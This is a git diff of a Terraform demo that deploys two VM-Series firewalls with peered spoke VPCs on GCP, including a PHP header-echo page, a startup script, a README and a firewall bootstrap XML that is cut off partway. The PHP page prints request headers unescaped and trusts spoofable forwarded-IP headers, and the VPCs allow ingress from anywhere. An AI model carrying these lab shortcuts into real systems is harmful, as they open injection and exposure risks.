+++ b/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php
@@ -0,0 +1,62 @@
+<?php
+function microtime_float()
+{
+    list($usec, $sec) = explode(" ", microtime());
+    return ((float)$usec + (float)$sec);
+}
+
+$time_start = microtime_float();
+
+// Sleep for a while
+usleep(100);
+
+$time_end = microtime_float();
+$time = $time_end - $time_start;
+function getRealIpAddr()
+{
+    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
+    {
+      $ip=$_SERVER['HTTP_CLIENT_IP'];
+    }
+    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
+    {
+      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
+    }
+    else
+    {
+      $ip=$_SERVER['REMOTE_ADDR'];
+    }
+    return $ip;
+}
+echo '<b style="color: red">
+      SOURCE & DESTINATION ADDRESSES
+      </b></br> ';
+echo '<strong>'. "INTERVAL" .'</strong>: '. $time .'<br />';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo '<strong>'. "SOURCE IP" .'</strong>: '. $sourceIPAddress .'<br />';
+echo '<strong>'. "LOCAL  IP" .'</strong>: '. $localIPAddress .'<br />';
+
+$vm_name = gethostname();
+echo '<strong>'. "VM NAME" .'</strong>: '. $vm_name .'<br />';
+echo ''. '<br />';
+echo '<b style="color: blue">
+      HEADER INFORMATION
+      </b></br> ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+  if (substr($header, 0, 5) == 'HTTP_') {
+    /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+    $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+    /* Replace underscores by the dashes, as the browser sends them */
+    $clean_header = str_replace('_', '-', $clean_header);
+
+    /* Cleanup: standard headers are first-letter uppercase */
+    $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+    /* And show'm */
+    echo '<strong>'. $header .'</strong>: '. $value .'<br />';
+  }
+}
+?>
diff --git a/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh
new file mode 100644
index 00000000..1349754f
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2 php7. libapache2-mod-php7.; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
diff --git a/gcp/adv_peering_2fw_2spoke/spoke1.tf b/gcp/adv_peering_2fw_2spoke/spoke1.tf
new file mode 100644
index 00000000..fbbe81ec
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/spoke1.tf
@@ -0,0 +1,61 @@
+provider "google" {
+  credentials = "${var.spoke1_project_authfile}"
+  project     = "${var.spoke1_project}"
+  region      = "${var.region}"
+  alias       = "spoke1"
+}
+
+#************************************************************************************
+# CREATE SPOKE2 VPC & SPOKE1 VMs (w/ INTLB)
+#************************************************************************************
+module "vpc_spoke1" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "spoke1-vpc"
+  subnetworks       = ["spoke1-subnet"]
+  ip_cidrs          = ["10.10.1.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+
+  providers = {
+    google = "google.spoke1"
+  }
+}
+
+module "vm_spoke1" {
+  source          = "./modules/create_vm/"
+  vm_names        = ["spoke1-vm1", "spoke1-vm2"]
+  vm_zones        = ["${var.region}-a", "${var.region}-a"]
+  vm_machine_type = "f1-micro"
+  vm_image        = "ubuntu-os-cloud/ubuntu-1604-lts"
+  vm_subnetworks  = ["${module.vpc_spoke1.subnetwork_self_link[0]}", "${module.vpc_spoke1.subnetwork_self_link[0]}"]
+  vm_ssh_key      = "ubuntu:${var.ubuntu_ssh_key}"
+  startup_script  = "${file("${path.module}/scripts/webserver-startup.sh")}"                                         // default "" - runs no startup script
+
+  internal_lb_create = true           // default false
+  internal_lb_name   = "spoke1-intlb" // default "intlb"
+  internal_lb_ports  = ["80", "443"]  // default ["80"]
+  internal_lb_ip     = "10.10.1.100"  // default "" (assigns an any available IP in subnetwork )
+
+  providers = {
+    google = "google.spoke1"
+  }
+}
+
+#************************************************************************************
+# CREATE PEERING LINK SPOKE1-to-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke1_to_trust" {
+  name         = "spoke1-to-trust"
+  network      = "${module.vpc_spoke1.vpc_self_link}"
+  peer_network = "${module.vpc_trust.vpc_self_link}"
+
+  provisioner "local-exec" {
+    command = "sleep 45"
+  }
+
+  depends_on = [
+    "google_compute_network_peering.trust_to_spoke2",
+  ]
+  provider = "google.spoke1"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/spoke2.tf b/gcp/adv_peering_2fw_2spoke/spoke2.tf
new file mode 100644
index 00000000..718ff170
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/spoke2.tf
@@ -0,0 +1,55 @@
+provider "google" {
+  credentials = "${var.spoke2_project_authfile}"
+  project     = "${var.spoke2_project}"
+  region      = "${var.region}"
+  alias       = "spoke2"
+}
+
+#************************************************************************************
+# CREATE SPOKE2 VPC & SPOKE2 VM
+#************************************************************************************
+module "vpc_spoke2" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "spoke2-vpc"
+  subnetworks       = ["spoke2-subnet"]
+  ip_cidrs          = ["10.10.2.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+
+  providers = {
+    google = "google.spoke2"
+  }
+}
+
+module "vm_spoke2" {
+  source          = "./modules/create_vm/"
+  vm_names        = ["spoke2-vm1"]
+  vm_zones        = ["${var.region}-a"]
+  vm_machine_type = "f1-micro"
+  vm_image        = "ubuntu-os-cloud/ubuntu-1604-lts"
+  vm_subnetworks  = ["${module.vpc_spoke2.subnetwork_self_link[0]}"]
+  vm_ssh_key      = "ubuntu:${var.ubuntu_ssh_key}"
+
+  providers = {
+    google = "google.spoke2"
+  }
+}
+
+#************************************************************************************
+# CREATE PEERING LINK SPOKE2-to-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke2_to_trust" {
+  name         = "spoke2-to-trust"
+  network      = "${module.vpc_spoke2.vpc_self_link}"
+  peer_network = "${module.vpc_trust.vpc_self_link}"
+
+  provisioner "local-exec" {
+    command = "sleep 45"
+  }
+
+  depends_on = [
+    "google_compute_network_peering.spoke1_to_trust",
+  ]
+  provider = "google.spoke2"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/variables.tf b/gcp/adv_peering_2fw_2spoke/variables.tf
new file mode 100644
index 00000000..f273131f
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/variables.tf
@@ -0,0 +1,65 @@
+#************************************************************************************
+# GCP VARIABLES
+#************************************************************************************
+variable "region" {
+  default = "us-east4"
+}
+
+#************************************************************************************
+# main.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "main_project" {
+  description = "Existing project ID for main project (all resources deployed in main.tf)"
+  default     = "host-project-242119"
+}
+
+variable "main_project_authfile" {
+  description = "Authentication file for main project (all resources deployed in main.tf)"
+  default     = "host-project-b533f464016c.json"
+}
+
+#************************************************************************************
+# spoke1.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke1_project" {
+  description = "Existing project for spoke1 (can be the same as main project and can be same as main project)."
+  default     = "host-project-242119"
+}
+
+variable "spoke1_project_authfile" {
+  description = "Authentication file for spoke1 project (all resources deployed in spoke1.tf)"
+  default     = "host-project-b533f464016c.json"
+}
+
+#************************************************************************************
+# spoke2.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke2_project" {
+  description = "Existing project for spoke2 (can be the same as main project and can be same as main project)."
+  default     = "host-project-242119"
+}
+
+variable "spoke2_project_authfile" {
+  description = "Authentication file for spoke2 project (all resources deployed in spoke2.tf and can be same as main project)"
+  default     = "host-project-b533f464016c.json"
+}
+
+#************************************************************************************
+# VMSERIES SSH KEY & IMAGE (not required if bootstrapping)
+#************************************************************************************
+variable "vmseries_ssh_key" {
+  default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDa7UUo1v42jebXVHlBof9E9GAFfalTndZQmvlmFu9e88euqrLI4xEZwg9ihwPFVTXOmrAogye6ojv5rbf3f13ZFYB+USjcR/9RFX+DKkPmXluC5Xq3z0ZlxY3QETHSlr6G8pfEqNwFebYJmKZ1MVNUztmb1DTIhjbFN4IAK/8NzQTbOYnEbXV4BB9E9Xe7dtuDuQrgaoII7KITnYdY4tjI10/K01Ay52PC7eISvZBRZntto2Mg1WjWQAwyIJHFC8nXoE04Wbzv91ohLfs/Og/dSOhdFymX1KVx5XSZWZ0POEOFY3rsDHFDrMiZIxipfuvBtEsznExp7ybkIDtWOxNX admin"
+}
+
+#************************************************************************************
+# UBUNTU SSH KEY
+#************************************************************************************
+variable "ubuntu_ssh_key" {
+  default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDk7y0D0Rz4F5J9Lu7gtTRTaEkJdWNLpmnDXcvHvaNC3euQ0KITIU6XaPHlXiB1M8pCrmBw3CFkFLxnPoGHrcN39wi2BR9d6Y1piz1v0gJqbggdMloSnrz51OVPqqC5BjtN/lB9hTcyNrh4MDfv37sRChHJb31s934vbj+qeiR16ZeLHH5moRXnyuzIvVUePnXHZvYz0M+YxJtvf806cz+Dvio72Y5g69/DUWReTNZ3h51MKseYMJT0Uu7mPJUZlH+xURc8zzzFazTE1jD7qL2z497si7oVHzmHm5nCECNayore3jzp5YYQkzEfe2fujxeM4UGlEBYuMkUxlH8QV5qN ubuntu"
+}
+
+variable "vmseries_image" {
+  # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-814"
+   default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814"
+  # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814"
+}
diff --git a/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf
new file mode 100644
index 00000000..ef6db3f1
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf differ
diff --git a/gcp/adv_peering_2fw_2spoke_common/README.md b/gcp/adv_peering_2fw_2spoke_common/README.md
new file mode 100644
index 00000000..0ac8b6bc
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/README.md
@@ -0,0 +1,59 @@
+# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VPCs
+
+Terraform creates 2 VM-Series firewalls that secure ingress/egress traffic from spoke VPCs.  The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. All TCP/UDP traffic originating from the spokes is routed to internal load balancers in the trust VPC.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf) for more information.
+
+</br>
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke_common/images/diagram.png">
+</p>
+
+
+## Prerequistes 
+* Valid GCP Account with existing project
+* Access to GCP Cloud Terminal or to a machine with a Terraform 12 installation
+
+</br>
+
+## How to Deploy
+### 1. Setup & Download Build
+In your project, open GCP Cloud Terminal and run the following.
+```
+$ gcloud services enable compute.googleapis.com
+$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo
+$ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_2fw_2spoke_common
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and edit variables (lines 1-4) to match your Project ID, SSH Key (from step 1), and VM-Series type.
+
+```
+$ vi terraform.tfvars
+```
+
+<p align="center">
+<b>Your terraform.tfvars should look like this before proceeding</b>
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png" width="75%" height="75%" >
+</p>
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+</br>
+
+## How to Destroy
+Run the following to destroy the build and remove the SSH key created in step 1.
+```
+$ terraform destroy
+$ rm ~/.ssh/gcp-demo*
+```
+
+</br>
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/bootstrap.xml b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/bootstrap.xml
new file mode 100644
index 00000000..5391083c
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/bootstrap.xml
@@ -0,0 +1,1065 @@
+<?xml version="1.0"?>
+<config ptpl="gcp-common" version="9.0.0" urldb="paloaltonetworks">
+  <devices ptpl="gcp-common">
+    <entry name="localhost.localdomain" ptpl="gcp-common">
+      <deviceconfig ptpl="gcp-common">
+        <system ptpl="gcp-common">
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule ptpl="gcp-common">
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service ptpl="gcp-common">
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>PA-VM</hostname>
+        </system>
+        <setting ptpl="gcp-common">
+          <config ptpl="gcp-common">
+            <rematch>yes</rematch>
+          </config>
+          <management ptpl="gcp-common">
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDbHV3bGJ4c0Q3QUNFdHYvSVR3R2llSlRqWFpGTjR6QnhGb2ZZdlRVR1RRZ1plU0M5c2RFbHFZdlhIZGRHdnNOVWhON2lLQTdjb2dMTnJGa3R5aXVDZWFlMk9jeXVCNXJ4UXY1YzdCSVZrMlFuMkpaWDNYa2lyS1hBN0NOZUNUWllibFN6dExpbTkzTENPR0FhMG0zYS9oTXVWbGlpM3FrTU1NbUhmakoxQ2trc1NmdkpUL1BLb3c2eFpkVS9Kem5lSThsNVhSeTdUc0NZU1ovdVdOa21IWDdibDV4WFpPdEZOOEExU0wrRWFUU3ZHQ2ZNMlNLNm5wSEZRK1RCek5adFh2YmxLcWtJQWJhZkhuSXI1TWFEQ1BhVUgyc1B3YXY1V2syOU1idmh3cHZEeXVLaERkR3U3WkExOTlKUDNrUXc5U3pva2diTEU1V1EyRHI2cnBBQ3YgZ2NwLWRlbW8=</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>4.2.2.2</dns-secondary>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <network ptpl="gcp-common">
+        <interface ptpl="gcp-common">
+          <ethernet ptpl="gcp-common">
+            <entry name="ethernet1/1" ptpl="gcp-common">
+              <layer3 ptpl="gcp-common">
+                <ndp-proxy ptpl="gcp-common">
+                  <enabled ptpl="gcp-common">no</enabled>
+                </ndp-proxy>
+                <dhcp-client ptpl="gcp-common">
+                  <create-default-route ptpl="gcp-common">no</create-default-route>
+                </dhcp-client>
+                <lldp ptpl="gcp-common">
+                  <enable ptpl="gcp-common">no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2" ptpl="gcp-common">
+              <layer3 ptpl="gcp-common">
+                <ndp-proxy ptpl="gcp-common">
+                  <enabled ptpl="gcp-common">no</enabled>
+                </ndp-proxy>
+                <lldp ptpl="gcp-common">
+                  <enable ptpl="gcp-common">no</enable>
+                </lldp>
+                <dhcp-client ptpl="gcp-common"/>
+              </layer3>
+            </entry>
+          </ethernet>
+          <loopback ptpl="gcp-common">
+            <units ptpl="gcp-common">
+              <entry name="loopback.1" ptpl="gcp-common">
+                <adjust-tcp-mss ptpl="gcp-common">
+                  <enable ptpl="gcp-common">no</enable>
+                </adjust-tcp-mss>
+                <ip ptpl="gcp-common">
+                  <entry name="100.64.0.1/32" ptpl="gcp-common"/>
+                </ip>
+                <interface-management-profile ptpl="gcp-common">health-check</interface-management-profile>
+              </entry>
+            </units>
+          </loopback>
+        </interface>
+        <profiles ptpl="gcp-common">
+          <monitor-profile ptpl="gcp-common">
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile ptpl="gcp-common">
+            <entry name="health-check" ptpl="gcp-common">
+              <http ptpl="gcp-common">no</http>
+              <ssh ptpl="gcp-common">yes</ssh>
+              <permitted-ip ptpl="gcp-common">
+                <entry name="35.191.0.0/16" ptpl="gcp-common"/>
+                <entry name="130.211.0.0/22" ptpl="gcp-common"/>
+              </permitted-ip>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike ptpl="gcp-common">
+          <crypto-profiles ptpl="gcp-common">
+            <ike-crypto-profiles ptpl="gcp-common">
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles ptpl="gcp-common">
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles ptpl="gcp-common">
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos ptpl="gcp-common">
+          <profile ptpl="gcp-common">
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router ptpl="gcp-common">
+          <entry name="gcp-common-vr">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+              <member>loopback.1</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="health-probe-1">
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>35.191.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="health-probe-2">
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>130.211.0.0/22</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke1-vpc">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.1.0.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke2-vpc">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.2.0.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>192.168.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+              </bgp>
+            </protocol>
+          </entry>
+        </virtual-router>
+      </network>
+      <vsys>
+        <entry name="vsys1" ptpl="gcp-common">
+          <zone ptpl="gcp-common">
+            <entry name="trust" ptpl="gcp-common">
+              <network ptpl="gcp-common">
+                <layer3 ptpl="gcp-common">
+                  <member ptpl="gcp-common">loopback.1</member>
+                  <member ptpl="gcp-common">ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="untrust" ptpl="gcp-common">
+              <network ptpl="gcp-common">
+                <layer3 ptpl="gcp-common">
+                  <member ptpl="gcp-common">ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <import ptpl="gcp-common">
+            <network ptpl="gcp-common">
+              <interface ptpl="gcp-common">
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+                <member>loopback.1</member>
+                <member>vlan</member>
+                <member>loopback</member>
+                <member>tunnel</member>
+              </interface>
+              <vlan ptpl="gcp-common"/>
+              <virtual-router ptpl="gcp-common">
+                <member ptpl="gcp-common">gcp-common-vr</member>
+              </virtual-router>
+              <virtual-wire ptpl="gcp-common"/>
+            </network>
+          </import>
+          <application/>
+          <application-group/>
+          <service>
+            <entry name="service-tcp-221">
+              <protocol>
+                <tcp>
+                  <port>221</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="service-tcp-222">
+              <protocol>
+                <tcp>
+                  <port>222</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="inbound-web" uuid="0e0e042a-56bd-4e5d-a32e-d0cc7a8aa85e">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>web-browsing</member>
+                  </application>
+                  <service>
+                    <member>service-http</member>
+                    <member>service-https</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                  <log-setting>panorama</log-setting>
+                </entry>
+                <entry name="inbound-ssh" uuid="e388985f-c224-4de1-a228-3e44cc687334">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>service-tcp-221</member>
+                    <member>service-tcp-222</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                  <disabled>no</disabled>
+                  <description>If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222.</description>
+                  <log-setting>panorama</log-setting>
+                </entry>
+                <entry name="health-probe" uuid="006e35ee-b679-489e-a5e4-b02572c933dc">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>gcp-health-probes</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
